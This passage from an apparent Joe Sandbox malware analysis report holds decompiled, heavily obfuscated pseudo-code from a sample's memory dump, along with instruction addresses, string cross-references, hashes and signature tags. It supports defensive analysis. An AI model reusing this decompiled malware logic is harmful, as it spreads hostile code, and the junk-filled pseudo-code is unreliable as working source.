					_t252 = _t251 + 0xd81a;
					 *(_t254 - 0x20d8) =  *(_t254 - 8);
					_push( *(_t254 - 0x20d8));
					if(0x4557b0 >= _t219) {
						_t219 = 0;
						if(0 < 0) {
							 *0x65819c =  *0x65819c;
						}
						 *0x6581d2 = _t240;
						_t240 =  *0x658208; // 0x8bc4
					}
					_t241 = _t240 - 0xabee;
					_t248 = _t252 >> _t219;
					_t102 = _t254 - 0x2058;
					if((_t241 & 0x0000858d) != 0) {
						L21:
						goto L22;
					} else {
						 *0x658226 = _t241;
						_t241 = _t248;
						if((_t248 & 0x00a234ec) < 0) {
							L22:
							_t221 = _t219 - _t219 - 0x7eb6;
							 *0x65afd1 =  *0x65afd1 - _t241;
							 *(_t254 - 0x20d8) = _t102;
							 *(_t254 - 8) = _t102;
							 *0x65afcc =  *0x65afcc - 0x4737a9;
							if(0x4737a9 < 0x4737a9) {
								_t221 =  *0x658160; // 0x5e83
								 *0x6581ae = _t241;
								 *0x658234 =  *0x658234 + _t241 - 0x89ab5f;
								 *0x65afd6 = _t102;
								if(_t248 >= 0) {
									_t248 = _t248 - 1;
								}
								 *0x65afda = _t102;
							}
							 *0x65800c =  *0x65800c + 0xfc;
							_push( *(_t254 - 0x20d8));
							_t230 = 0xa379;
							_t108 =  *(_t254 - 8);
							if(0x308da0 >= 0x308da0) {
								 *0x658184 = 0x6d53;
								_t221 = 0x772965;
								_t230 = 0x8cdd;
								 *0x659b7d =  *0x659b7d + 0x8cdd;
								 *0x658226 = 0x8cdd;
								_t248 =  !0x00000000;
								_t245 = _t245 + _t245;
								if(_t108 <= 0) {
									 *0x65afdc = _t108;
								}
							}
							 *(_t254 - 8) = _t108;
							_t182 = (_t108 >> _t221) + (_t108 >> _t221);
							E005F41B5(_t182, _t245, _t248);
							 *((intOrPtr*)(_t254 - 0xc)) =  *((intOrPtr*)(_t254 - 0xc)) - _t182;
							_t76 =  *(_t254 - 8);
							_push( *((intOrPtr*)(_t254 - 0x2050)));
							_push(0x6265f3);
							goto __ebx;
						}
						 *0x658290 =  *0x658290 - _t248;
						 *0x65afd9 = _t102;
						goto L21;
					}
				}
				 *0x658032 =  *0x658032 + _t76;
				 *0x65804e =  *0x65804e + _t76;
				 *(_t254 - 8) =  !( *(_t254 - 8) - 1);
				 *0x65816e =  *0x65816e + 0x6695;
				_t195 = 0xcd2a;
				 *0x658228 = 0x9fb3;
				_t230 = _t248;
				 *0x65a781 =  *0x65a781 - _t248;
				 *0x65afd9 = _t76;
				_t245 = 0xffffffffffff1361;
				 *0x65afdc =  *0x65afdc - _t76;
				if(_t76 > 0x10e6) {
					goto L6;
				}
				goto L5;
			}

0x00626319
0x00626319
0x00626319
0x00626319
0x00626319
0x00626321
0x00626323
0x00626323
0x00626331
0x00626338
0x00626347
0x0062634a
0x00626350
0x00626365
0x00628582
0x00628594
0x006285ab
0x006285b8
0x006285bd
0x006285cc
0x006285d1
0x006285d8
0x006285e1
0x006285e4
0x006285ee
0x0062877b
0x0062877b
0x00628785
0x00628793
0x006287c7
0x006287ca
0x006287d1
0x006287e4
0x006287e7
0x006287ef
0x0062881b
0x00628823
0x00628825
0x00628828
0x00628832
0x00628834
0x00628843
0x00628850
0x00628855
0x00628861
0x00628861
0x00628863
0x0062886f
0x0062886f
0x00628882
0x00628882
0x0062888e
0x00628893
0x00628898
0x00628898
0x006285f4
0x006285f8
0x006285fa
0x0062860f
0x0062860f
0x00628613
0x0062861f
0x00628623
0x0062862c
0x00628632
0x0062863d
0x00628643
0x0062864b
0x0062864b
0x00628651
0x00628651
0x00628668
0x0062866b
0x00628680
0x00628682
0x00628694
0x0062869a
0x006286a0
0x006286a2
0x006286a2
0x006286a7
0x006286ad
0x006286b0
0x006286b3
0x006286bb
0x006286c2
0x006286cb
0x006286d3
0x006286d6
0x006286de
0x006286e3
0x006286e3
0x006286e7
0x006286e7
0x006286de
0x006286f6
0x00628700
0x00628708
0x0062870d
0x00628712
0x0062871f
0x0062874e
0x00628756
0x0062875e
0x00000000
0x00628723
0x00628729
0x0062872e
0x00628760
0x00628773
0x00628779
0x00000000
0x00628779
0x00628733
0x00628741
0x00628749
0x00000000
0x0062874c
0x0062871f
0x0062636d
0x006263ce
0x006263cf
0x006263d4
0x006263d4
0x006263d7
0x006263dd
0x006263eb
0x006263f5
0x006263fb
0x006263fe
0x00626405
0x0062640e
0x00626414
0x00626417
0x00626420
0x00626425
0x00626427
0x00626427
0x0062642d
0x00626434
0x0062643b
0x0062643b
0x00626444
0x0062644c
0x0062644e
0x0062644e
0x00626453
0x00626459
0x00626459
0x0062645b
0x00626465
0x00626475
0x00626482
0x00626484
0x00626488
0x0062648a
0x0062648a
0x00626491
0x00626498
0x00626498
0x0062649f
0x006264a4
0x006264a7
0x006264b2
0x006264d3
0x00000000
0x006264b4
0x006264b4
0x006264bb
0x006264c4
0x006264db
0x006264f8
0x006264fd
0x00626503
0x0062650c
0x00626512
0x0062651a
0x00626523
0x0062652a
0x0062653a
0x00626541
0x00626549
0x0062654b
0x0062654b
0x0062654c
0x00626551
0x00626555
0x00626568
0x00626575
0x00626581
0x00626586
0x0062658f
0x00626596
0x0062659c
0x006265a0
0x006265a6
0x006265b3
0x006265b5
0x006265ba
0x006265bc
0x006265bc
0x006265ba
0x006265c3
0x006265c9
0x006265cb
0x006265d0
0x006265d6
0x006265d9
0x006265e7
0x006265f1
0x006265f1
0x006264c6
0x006264cd
0x00000000
0x006264cd
0x006264b2
0x00626378
0x0062637f
0x0062638c
0x00626396
0x0062639d
0x006263a2
0x006263a9
0x006263ae
0x006263b4
0x006263bb
0x006263c0
0x006263cc
0x00000000
0x00000000
0x00000000

Strings

srcore.dll, xrefs: 0062880D
GetThreadWaitChain, xrefs: 006285CC
_fltused, xrefs: 00628788
ehui.dll, xrefs: 006287DF
RtlIpv4StringToAddressW, xrefs: 00626470, 00628715
api-ms-win-core-errorhandling-l1-1-0.dll, xrefs: 0062881E
api-ms-win-core-memory-l1-1-0.dll, xrefs: 006264E5
tx6, xrefs: 00626319
NlsLexicons0047.dll, xrefs: 00626353
Heap32ListNext, xrefs: 006265E2
IEShims.dll, xrefs: 00628606
d3d10core.dll, xrefs: 0062858D, 006287B3
VarFormatDateTime, xrefs: 00628661

Memory Dump Source

Source File: 00000000.00000002.269775335.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_9nSv9py6hs.jbxd

Similarity

API ID:
String ID: GetThreadWaitChain$Heap32ListNext$IEShims.dll$NlsLexicons0047.dll$RtlIpv4StringToAddressW$VarFormatDateTime$_fltused$api-ms-win-core-errorhandling-l1-1-0.dll$api-ms-win-core-memory-l1-1-0.dll$d3d10core.dll$ehui.dll$srcore.dll$tx6
API String ID: 0-2121080392
Opcode ID: 3137fce6089a20d8890564666bc9584146d7c49cf644e218a333b2a3d945bde9
Instruction ID: 34d96ad175902205ff965e36f251ca14f6e83bac86519430cbc54c5ce50e316e
Opcode Fuzzy Hash: 3137fce6089a20d8890564666bc9584146d7c49cf644e218a333b2a3d945bde9
Instruction Fuzzy Hash: 8FE11575A10B56CFCB10EFB8EC941C97BB3FB29321F045269C945A3B22E7750A85CB45

Uniqueness

Uniqueness Score: -1.00%

Function 0060532C Relevance: 15.8, APIs: 1, Strings: 8, Instructions: 93
encryptionCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E0060532C(char __eax, void* __ebx, void* __ecx, void* __edx, void* __edi, signed int __esi) {
				char* _t29;
				int _t30;
				int _t38;
				int _t40;
				char* _t62;
				intOrPtr _t63;
				char* _t66;
				void* _t67;
				short _t69;
				unsigned short _t70;
				void* _t81;
				signed int _t84;
				void* _t86;

				_t84 = __esi;
				_t81 = __edi;
				_t67 = __ecx;
				if((__esi & 0x0000b576) <= 0) {
					 *0x65afd8 = __eax;
				}
				_t29 =  *(_t86 - 8);
				 *(_t86 - 0xc) = _t29;
				 *(_t86 - 0x10) = _t29;
				_t69 = _t67 - 1 + 0x81;
				_t30 =  *(_t86 - 0xc);
				 *(_t86 - 0xc) = _t30;
				 *(_t86 - 8) = _t30;
				L00600D66("dwmcore.dll", _t69, 0xa6bd, _t81, _t84, 0, 1,  *(_t86 - 0x10));
				 *0x658146 = _t69;
				_t70 =  *0x658178; // 0x6a16
				_push(0);
				 *(_t86 - 0x10) = "GetProcessorSystemCycleTime";
				if("Policy.6.0.Microsoft.Ink.dll" < _t70) {
					_t70 = _t70 - 0x76 >> _t70 - 0x76;
				}
				_t38 = CryptReleaseContext( *(_t86 - 0x5c));
				_t62 = "GetDlgItem";
				 *(_t86 - 0x1c) = _t62;
				 *(_t86 - 8) = _t38;
				_t40 =  *(_t86 - 8);
				 *(_t86 - 0x14) = _t62;
				_t63 =  *((intOrPtr*)(_t86 - 0x18));
				 *0x65afcd =  *0x65afcd - _t63;
				if(_t70 + _t70 > _t70 + _t70) {
					 *0x6581e0 = 0xa413;
					 *0x65afd6 = _t40;
					_t63 = _t63 - _t40;
				}
				 *(_t86 - 8) = _t40;
				_t66 = _t63 - 0xffffffffffd1f87f;
				 *(_t86 - 0x1c) = _t66;
				_push(_t66);
				_push(E0060547D);
				_push(E005B4611);
				return 0;
			}

0x0060532c
0x0060532c
0x0060532c
0x00605331
0x00605333
0x00605333
0x00605339
0x00605344
0x00605347
0x00605356
0x00605367
0x0060536f
0x00605377
0x00605384
0x00605394
0x0060539e
0x006053b2
0x006053c0
0x006053ce
0x006053d6
0x006053d6
0x006053f0
0x0060540b
0x00605410
0x00605415
0x0060541d
0x00605420
0x00605425
0x00605428
0x00605435
0x00605437
0x00605448
0x0060544e
0x0060544e
0x00605458
0x00605469
0x0060546e
0x00605471
0x00605472
0x00605477
0x0060547c

APIs

CryptReleaseContext.ADVAPI32(?), ref: 006053F0

Strings

srcore.dll, xrefs: 0060538F
GetProcessorSystemCycleTime, xrefs: 006053BB
NlsLexicons0047.dll, xrefs: 0060536A
dispex.dll, xrefs: 006053A8, 0060545B
Policy.6.0.Microsoft.Ink.dll, xrefs: 006053C6
dwmcore.dll, xrefs: 0060537A
findnetprinters.dll, xrefs: 00605350
GetDlgItem, xrefs: 0060540B

Memory Dump Source

Source File: 00000000.00000002.269775335.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_9nSv9py6hs.jbxd

Similarity

API ID: ContextCryptRelease
String ID: GetDlgItem$GetProcessorSystemCycleTime$NlsLexicons0047.dll$Policy.6.0.Microsoft.Ink.dll$dispex.dll$dwmcore.dll$findnetprinters.dll$srcore.dll
API String ID: 829835001-4155316512
Opcode ID: 329dc8351d5502e3874fda61b6f9eef911a10c8a6e333211f18fa812afc0dcb3
Instruction ID: e83016139cab1a5b2e88a3b3e32e92363b538397ad94294b2ccd612b9c408a7d
Opcode Fuzzy Hash: 329dc8351d5502e3874fda61b6f9eef911a10c8a6e333211f18fa812afc0dcb3
Instruction Fuzzy Hash: D8316B74E1070A9FCB00DFF9E8C06DEBBB2EB2C315F4042299A05F7791E6711A458B61

Uniqueness

Uniqueness Score: -1.00%

Function 005D04A0 Relevance: 15.3, Strings: 12, Instructions: 345
COMMONCrypto

Download Yara Rule

C-Code - Quality: 61%

			E005D04A0(signed int __eax, signed int __ebx, void* __ecx, signed short __edx, void* __edi, void* __esi) {
				signed int _t80;
				signed int _t83;
				signed int _t84;
				signed int _t90;
				signed int _t93;
				signed int _t96;
				signed int _t100;
				signed int _t102;
				signed int _t113;
				signed int _t116;
				signed int _t118;
				signed int _t120;
				signed int _t121;
				signed int _t122;
				signed int _t127;
				signed int _t136;
				intOrPtr _t137;
				intOrPtr _t143;
				signed int _t146;
				unsigned short _t187;
				short _t188;
				intOrPtr _t192;
				intOrPtr _t201;
				void* _t202;
				signed int _t228;
				short _t230;
				void* _t241;
				signed int _t242;
				void* _t245;
				unsigned short _t246;
				signed int _t247;
				void* _t249;

				_t245 = __esi;
				_t241 = __edi;
				_t216 = __edx;
				_t80 = __eax;
				asm("sbb eax, 0x65afcc");
				_t136 = __ebx & 0x00000052;
				_t187 = __ecx - 0x4f8106;
				if(_t187 < _t187) {
					_t187 = (_t187 >> _t187) - (_t187 >> _t187);
					_t216 = __edx + 0x79ee94;
				}
				 *0x658212 = _t216;
				 *0x659f79 = _t80;
				 *(_t249 - 8) = _t80;
				if(_t80 == 0x1ba8) {
					L7:
					_t188 = _t187 + 1;
					if(_t188 == _t188) {
						goto L10;
					}
					_t188 = 0x8333;
					 *0x6581e6 = _t216;
					goto L9;
				} else {
					_t80 = _t80 - _t136;
					_t187 = _t187 + 0x587306;
					 *0x658196 = _t187;
					_t216 = 0x91ed;
					 *0x65821c = 0x91ed;
					_t245 = _t245 - 0xa63bdf;
					if(_t245 != 0 || _t245 <= 0) {
						_t80 = _t80 + _t80;
						if(_t80 < 0) {
							_t241 = _t241 - 0xd7bbae;
							_t80 =  *0x658821; // 0xffffffff
						}
						goto L7;
					} else {
						L9:
						_t216 = 0;
						L10:
						 *0x65afd6 =  *0x65afd6 - _t80 + 0xb5;
						_t83 =  *(_t249 - 8);
						_push(0);
						_t137 =  *0x65afdb; // 0x5c
						_t242 = _t241 - 0xe0adaf;
						 *(_t249 - 8) = _t83;
						_t84 = _t83 + _t83;
						if(_t84 != 0x22b092) {
							L13:
							 *0x65816c = _t188;
							_t188 = _t188 + _t188 + 0x70796a;
							if((_t216 & 0x00000087) < 0 || (_t216 & 0x0000950f) < 0) {
								 *0x65afd8 =  *0x65afd8 + _t84;
								 *0x65afd8 = _t84;
								 *0x65afdb =  *0x65afdb + _t84;
								_t242 = _t242 - 0x0000dc05 + 0x00000001 & 0x00004526;
								_t84 = "GetProcessorSystemCycleTime" - _t137;
								L16:
								 *0x658108 =  *0x658108 - 0x3fe97a;
								 *0x65afcd =  *0x65afcd + _t188;
								_t188 = _t188 + _t188 - 1;
								goto L17;
							} else {
								L17:
								if(_t188 <= _t188) {
								}
								 *0x65afd6 = _t84;
								_t246 = _t245 - 0xb10d9e;
								 *0x65afda =  *0x65afda + 0xd9;
								_push( *0x658126);
								 *(_t249 - 0xc) =  *(_t249 - 8);
								_t143 =  *(_t249 - 0x14) - 0x4abb39;
								_t90 =  *(_t249 - 0xc);
								_push( *0x65817a);
								if(0 != 0) {
									 *0x658180 =  *0x658180;
									 *0x65819a = 0;
								}
								 *(_t249 - 8) = _t90;
								_t93 =  *(_t249 - 8);
								if(_t143 > 0x3e) {
									_t143 =  *((intOrPtr*)(_t249 - 0x18));
									 *0x658168 = 0x556a;
								}
								_t192 =  *0x65819c; // 0x169d
								 *(_t249 - 8) = _t93;
								L005B1BC0(_t93, _t143, _t192, _t216, _t242, _t246, _t93, 1, _t93);
								_t96 =  *(_t249 - 8);
								_push( *0x658028);
								_t144 = 0x414610;
								 *(_t249 - 8) = _t96;
								if(_t96 > 0x1b) {
									 *(_t249 - 0x14) = 0x3b23ad;
									_t144 = 0;
								}
								_t193 = 0x695c;
								_t100 =  *(_t249 - 8);
								_push( *0x6580b8);
								if(_t144 <= _t144) {
									 *((intOrPtr*)(_t249 - 0x18)) = 0x695c;
									_t193 = 0x6b73;
									 *0x65afd0 =  *0x65afd0 + 0x6b73;
								}
								_t247 = _t246 >> _t193;
								_push( *0x658096);
								 *(_t249 - 8) = _t100;
								_t102 =  *(_t249 - 8);
								_t146 = (_t144 >> 0) + (_t144 >> 0);
								 *(_t249 - 8) = _t102;
								if(_t102 >= 0x15657b) {
									 *0x65afcc =  *0x65afcc + _t146;
									 *(_t249 - 0x14) = _t146;
								}
								_push( *0x658096);
								 *(_t249 - 0x14) = 0x40c2e8;
								_t108 =  *(_t249 - 8);
								L005B1BC0( !_t108, 0, 0x5f9d, 0x8426, _t242, _t247,  !_t108,  !_t108,  !_t108);
								_push( *0x658144);
								 *0x658166 = 0x5ed1;
								_t113 =  *(_t249 - 8);
								_push( *0x658096);
								if(0 != 0) {
									L32:
									goto L33;
								} else {
									if(0x5e3e < 0x5e3e) {
										L33:
										 *0x65a657 =  *0x65a657 + _t247;
										_push( *0x658012);
										 *(_t249 - 8) = _t113;
										 *(_t249 - 0x14) = 0x3a1d5d;
										_t116 =  *(_t249 - 8);
										_t201 =  *0x658140; // 0x701d
										_t202 = _t201 - 0x72;
										 *0x65afd0 =  *0x65afd0 - _t202;
										 *0x659d19 =  *0x659d19 - 0x9f69;
										_t228 = _t247;
										 *(_t249 - 8) = _t116;
										 *(_t249 - 0xc) =  *(_t249 - 0xc) + _t116 - 0x17b1f1;
										 *(_t249 - 0x10) = 0x3a1d5d;
										 *(_t249 - 0x10) = 0x3a1d5d;
										_t118 =  *(_t249 - 8);
										_push( *0x6580fa);
										if(_t202 >= _t202 && _t202 < _t202) {
											 *((intOrPtr*)(_t249 - 0x20)) =  *((intOrPtr*)(_t249 - 0x20)) + _t202;
										}
										 *0x6581b0 = _t228;
										 *0x65afd5 = _t118;
										_push( *0x6580f4);
										if((_t228 & 0x00008ae4) >= 0) {
											_t228 =  !_t228;
										}
										 *(_t249 - 8) = _t118;
										 *(_t249 - 0x10) = 0xb5;
										_t120 =  *(_t249 - 8);
										 *(_t249 - 8) = _t120;
										if(_t120 < 0x16b6) {
											 *(_t249 - 0x14) =  *(_t249 - 0x14) - 0xfffffffffff8ee73;
											 *0x658184 = _t202 + 0x5dac;
										}
										_t230 = 0x8cfb;
										_t121 =  *(_t249 - 8);
										 *(_t249 - 0xc) = _t121;
										 *(_t249 - 0x10) = _t121;
										_t122 =  *(_t249 - 0xc);
										_push( *0x6580e0);
										 *0x65afcc =  *0x65afcc - 0x1c614d;
										 *(_t249 - 8) = _t122;
										_push(0);
										_push(1);
										_push(_t122 - 0x19d9);
										L005B505E(_t122 - 0x19d9);
										_t127 =  *(_t249 - 8);
										_push( *0x658072);
										if(0x67a5 >= 0x67a5) {
											_t230 = 0x9234;
										}
										 *0x658200 = _t230;
										_push( *0x65823a);
										 *0x6581b4 = _t230;
										 *0x65afd6 = _t127;
										 *(_t249 - 8) = _t127;
										if(_t127 + _t127 == 0x2e) {
											 *(_t249 - 0x10) =  *(_t249 - 0x10) + 0x55;
										}
										 *(_t249 - 0x14) = 0x55;
										_push(0x5d09a8);
										_push(E0064F3FD);
										return  *(_t249 - 8);
									}
									 *((intOrPtr*)(_t249 - 0x20)) =  *((intOrPtr*)(_t249 - 0x20)) + 0x5e3e;
									goto L32;
								}
							}
						}
						if("_fltused" != 0x37e759) {
							goto L16;
						}
						_t137 = 0x4d1e1f;
						goto L13;
					}
				}
			}

0x005d04a0
0x005d04a0
0x005d04a0
0x005d04a0
0x005d04a0
0x005d04a5
0x005d04a8
0x005d04b0
0x005d04b5
0x005d04bd
0x005d04bd
0x005d04be
0x005d04c5
0x005d04ca
0x005d04d1
0x005d052e
0x005d052e
0x005d0531
0x00000000
0x00000000
0x005d0539
0x005d053d
0x00000000
0x005d04d3
0x005d04d3
0x005d04e4
0x005d04ea
0x005d04f7
0x005d04fb
0x005d0504
0x005d050d
0x005d0514
0x005d0518
0x005d051a
0x005d0524
0x005d052b
0x00000000
0x005d0544
0x005d0544
0x005d0544
0x005d0546
0x005d0549
0x005d0553
0x005d0556
0x005d0558
0x005d055e
0x005d0564
0x005d0567
0x005d056e
0x005d0584
0x005d0584
0x005d058d
0x005d0596
0x005d059f
0x005d05a5
0x005d05b3
0x005d05b9
0x005d05ca
0x005d05cf
0x005d05d4
0x005d05db
0x005d05e3
0x00000000
0x005d05e4
0x005d05e4
0x005d05e7
0x005d05e7
0x005d05ec
0x005d05f2
0x005d05fa
0x005d0603
0x005d060d
0x005d0616
0x005d061c
0x005d061f
0x005d062a
0x005d062c
0x005d0633
0x005d0633
0x005d063a
0x005d0644
0x005d064a
0x005d064c
0x005d0653
0x005d0653
0x005d065a
0x005d0661
0x005d0668
0x005d0672
0x005d0675
0x005d067c
0x005d0681
0x005d0686
0x005d0696
0x005d0699
0x005d0699
0x005d069e
0x005d06ac
0x005d06af
0x005d06b9
0x005d06bb
0x005d06c3
0x005d06c7
0x005d06d9
0x005d06dd
0x005d06e0
0x005d06f4
0x005d06fc
0x005d0702
0x005d0704
0x005d070c
0x005d0717
0x005d071d
0x005d071d
0x005d073e
0x005d0745
0x005d0759
0x005d076d
0x005d0775
0x005d0789
0x005d07a9
0x005d07ac
0x005d07b5
0x005d07c5
0x00000000
0x005d07b7
0x005d07bd
0x005d07d6
0x005d07d6
0x005d07dc
0x005d07ec
0x005d07fb
0x005d0800
0x005d0803
0x005d080a
0x005d080d
0x005d0820
0x005d0826
0x005d0829
0x005d0831
0x005d0834
0x005d0837
0x005d083a
0x005d083d
0x005d084e
0x005d0854
0x005d0854
0x005d0857
0x005d0861
0x005d086f
0x005d087b
0x005d087d
0x005d087d
0x005d0887
0x005d088f
0x005d0892
0x005d08a1
0x005d08a8
0x005d08aa
0x005d08bb
0x005d08c2
0x005d08c8
0x005d08cc
0x005d08d9
0x005d08dc
0x005d08df
0x005d08e2
0x005d08e9
0x005d08fc
0x005d0903
0x005d0905
0x005d0907
0x005d0908
0x005d0921
0x005d0924
0x005d0938
0x005d0947
0x005d0947
0x005d094b
0x005d0952
0x005d0960
0x005d096f
0x005d0975
0x005d097c
0x005d097e
0x005d097e
0x005d0981
0x005d099d
0x005d09a2
0x005d09a7
0x005d09a7
0x005d07bf
0x00000000
0x005d07c2
0x005d07b5
0x005d0596
0x005d057b
0x00000000
0x00000000
0x005d057f
0x00000000
0x005d057f
0x005d050d

Strings

rpcref.dll, xrefs: 005D0844
api-ms-win-core-memory-l1-1-0.dll, xrefs: 005D0998
GetProcessorSystemCycleTime, xrefs: 005D05C5, 005D0796
GetThreadWaitChain, xrefs: 005D04DA
Y7, xrefs: 005D0575
YZe, xrefs: 005D05BF
dispex.dll, xrefs: 005D088A
_fltused, xrefs: 005D0570
ehui.dll, xrefs: 005D091C
LdrHotPatchRoutine, xrefs: 005D075C
CreateDisc.dll, xrefs: 005D06A7
z?, xrefs: 005D05CF

Memory Dump Source

Source File: 00000000.00000002.269775335.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_9nSv9py6hs.jbxd

Similarity

API ID:
String ID: CreateDisc.dll$GetProcessorSystemCycleTime$GetThreadWaitChain$LdrHotPatchRoutine$YZe$Y7$_fltused$api-ms-win-core-memory-l1-1-0.dll$dispex.dll$ehui.dll$rpcref.dll$z?
API String ID: 0-65638751
Opcode ID: 7a429aba8f472567d4b7dad055c9e2316e2eb00a2c9a93edff9da049ab9d5d50
Instruction ID: 9fcd45c754ad34ff37fc349dbda779ff5a3faa68a5b977bf22c4bdf7624657ef
Opcode Fuzzy Hash: 7a429aba8f472567d4b7dad055c9e2316e2eb00a2c9a93edff9da049ab9d5d50
Instruction Fuzzy Hash: EED1CB76A007069FCB10EFB9E8942CD7FB2FB28311F40A16AD945A7B52E2344A46CB55

Uniqueness

Uniqueness Score: -1.00%

Function 0063F597 Relevance: 13.0, Strings: 10, Instructions: 467
COMMONCrypto

Download Yara Rule

C-Code - Quality: 74%

			E0063F597(void* __ebx, signed int __ecx, signed int __edx, signed int __edi, signed int __esi) {
				signed int _t97;
				signed int _t98;
				signed char _t105;
				signed int _t110;
				signed int _t111;
				char _t113;
				signed int _t121;
				signed char _t128;
				signed int _t134;
				signed int _t144;
				signed char _t153;
				signed int _t154;
				signed int _t155;
				unsigned short _t161;
				void* _t162;
				signed int _t164;
				signed char _t181;
				char* _t206;
				unsigned short _t223;
				void* _t232;
				signed int _t233;
				signed char _t239;
				short _t248;
				char* _t255;
				intOrPtr _t259;
				intOrPtr _t260;
				signed char _t261;
				signed int _t262;
				short _t264;
				signed int _t269;
				void* _t271;
				short _t272;
				void* _t279;
				short _t282;
				void* _t283;
				unsigned short _t288;
				intOrPtr _t292;
				signed int _t297;
				void* _t298;
				signed int _t301;
				signed int _t303;
				void* _t304;
				signed int _t305;
				void* _t310;
				signed short _t311;
				intOrPtr _t320;
				void* _t323;

				_t303 = __esi;
				_t293 = __edi;
				_t269 = __edx;
				_t246 = __ecx;
				_t161 = __ebx - 0x31eccf;
				 *(_t323 - 0x14) = _t161;
				_t162 = _t161 + _t161;
				_t97 =  *(_t323 - 8);
				if( *_t97 != 0x5a4d) {
					if(__edi != 0) {
						L20:
						 *0x65a9fa =  *0x65a9fa + _t303;
					} else {
						_t162 = _t162 - 0x1605;
						 *(_t323 - 8) = _t97;
						if(_t97 >= 0x28f750) {
							if(_t162 <= 0x371bd4) {
								 *0x658100 =  *0x658100 + _t162;
							}
							_t259 =  *0x65814e; // 0x2256
							_t246 = _t259 - 0x76;
							 *0x65819c = _t246;
							_t320 =  *0x6581ea; // 0x8478
							_t303 = _t320 + 1 >> _t246;
							_t162 = 0xc7;
							goto L20;
						}
					}
					 *0x65afdc =  *0x65afdc - _t97;
					if(0xd2ad85 > 0x68be4) {
						L26:
						_t164 = 0xc0;
						 *0x65afd8 = _t97;
					} else {
						_t206 = "WmiApSrv.exe";
						 *(_t323 - 0x10) = _t206;
						_t164 = _t206 - 0x57;
						if(_t246 == _t246) {
							 *0x65816c = _t246;
							if(_t246 < _t246) {
							}
							 *0x6581ec = _t269;
							_t303 = _t269;
							goto L26;
						}
					}
					_t304 = _t303 + _t303;
					if( *(_t323 + 8) == 0) {
						L29:
						_t297 =  !0x00D2AD84;
						 *0x65afdc = _t97;
						 *(_t323 - 8) = _t97;
						_t98 = _t97 & 0x00002538;
						 *(_t323 - 0x14) = 0x3daaee;
						_t248 = (_t246 & 0x00005c69) - 0x59f3f7;
						 *((intOrPtr*)(_t323 - 0x20)) =  *((intOrPtr*)(_t323 - 0x20)) + _t248;
						 *0x65819a = _t248;
						_t305 = _t269;
						_t271 = _t269;
						 *0x65823c = _t305;
						if((_t305 & 0x00a7bccf) < 0) {
							_t305 = _t305 - 1;
							 *0x65afda = _t98;
						}
						_t298 = _t297 + 1;
						 *0x65afc9 =  *0x65afc9 + 0x3daaee;
						_t272 = _t271;
						_t172 = 0xbadbad;
						 *(_t323 - 8) = 0;
						if(0 > 0x1c404e) {
							L54:
							 *0x65875f =  *0x65875f - _t298;
							goto L55;
						} else {
							_t105 = 0xffffffffffffd0bc;
							 *0x6580ce =  *0x6580ce + 0xbadbad;
							_t172 = 0;
							_t248 = _t248 + 0x60;
							 *0x65afcf =  *0x65afcf + _t248;
							if(_t248 >= _t248) {
								_t272 = 0x8de1;
								 *0x659a75 =  *0x659a75;
								_t113 =  *0x65afd6; // 0x3d
								_t305 = _t305 - 0xb0bfbd;
								 *0x65afd9 = _t113;
								_t298 = _t298 + _t298;
								if(_t298 <= 0) {
									goto L54;
								}
								L55:
								_t105 = 0x244270;
								 *(_t323 - 0x10) = _t172;
							}
						}
						if(_t248 < _t248) {
							 *0x6596f5 =  *0x6596f5 + _t272;
							 *0x6581da = _t272;
							_t272 = 0xffffffffff6a996d;
						}
						 *0x658262 =  *0x658262 + _t305;
						 *0x65afd8 = _t105;
						 *0x65afda = 0;
						 *(_t323 - 8) = 0;
						_t110 =  *(_t323 - 8);
						 *(_t323 - 8) = _t110;
						 *0x658935 = _t110;
						_t111 =  *(_t323 - 8);
						if(0x3579c9 < 0x3579c9) {
							L61:
							goto L62;
						} else {
							 *0x6581b0 = _t272;
							 *0x658236 = 0xa1d4;
							 *0x65afd6 = _t111;
							 *0x65afda = _t111;
							if(_t298 != 0) {
								L62:
								_t181 =  *(_t323 - 0xc);
								 *(_t323 - 0x10) =  *(_t323 - 0x10) - _t181;
								 *(_t323 - 0x10) =  &(( *(_t323 - 0x10))[_t181]);
							} else {
								if(_t111 <= 0xbb8e4) {
									goto L61;
								}
							}
						}
						return  *((intOrPtr*)(_t323 - 0xb9));
					} else {
						_t255 =  *0x6581a6; // 0x6f71
						_t310 = _t304 - 0x87b44a - _t269;
						 *(_t323 - 8) = _t97;
						 *(_t323 - 0x10) =  *(_t323 - 0x18);
						_t164 = 0x48ffd5;
						 *(_t323 - 0x18) = _t255;
						_t246 = _t255 - 0x6548de + 0x80b3;
						_t97 =  *(_t323 - 8);
						if( *(_t323 - 0x4c) != 0) {
							_t311 = _t310 + 1;
							 *0x65a91e =  *0x65a91e + _t311;
							if(0xd2ad85 >= 0) {
								if(_t97 != 0) {
									_t164 =  *(_t323 - 8);
									 *(_t323 - 0xc) =  *(_t323 - 0xc) - _t97;
								}
								 *(_t323 - 0xc) =  *(_t323 - 0xc) - _t97;
								_t164 = _t323 - 0x14;
							}
							if(_t164 <= _t164) {
								_t246 = 0x783e;
								_t311 = _t269 - _t269 + 0x8f3343;
								if((_t311 & 0x0000af6f) < 0) {
									 *0x65afd6 = _t97;
									if(_t311 < 0) {
										_t311 = _t311 - 0xd6db;
										 *0x65afdb = _t97;
									}
									_t164 = 0;
								}
								_t164 = _t164 - 0x4219;
							}
							 *(_t323 - 0x14) =  *(_t323 - 0x14) + _t164;
							 *(_t323 - 8) =  *(_t323 - 0x4c);
							_t279 = _t269;
							if((_t311 & 0x0000aaaf) < 0) {
								_t134 =  *0x65afd6; // 0x3d
								 *0x65afda = _t134 + 0xce;
								 *0x658459 =  *0x658459 - 0xfe;
								 *0x65afc9 =  *0x65afc9;
								 *0x6580b0 =  *0x6580b0 + 0x361584;
								if(0x6c2b08 <= 0x6c2b08) {
									_t246 =  *0x65819c; // 0x169d
								}
								_t311 = 0x8c31;
							}
							 *0x6581ea =  *0x6581ea + _t279;
							_t121 =  *(_t323 - 8);
							 *(_t323 - 0xb4) = _t121;
							 *(_t323 - 8) = _t121;
							_t282 = _t279;
							_push(0x28);
